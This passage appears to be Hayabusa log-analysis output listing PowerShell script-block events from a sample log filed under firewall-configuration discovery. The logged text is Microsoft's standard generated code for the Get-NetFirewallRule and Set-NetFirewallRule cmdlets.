[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] 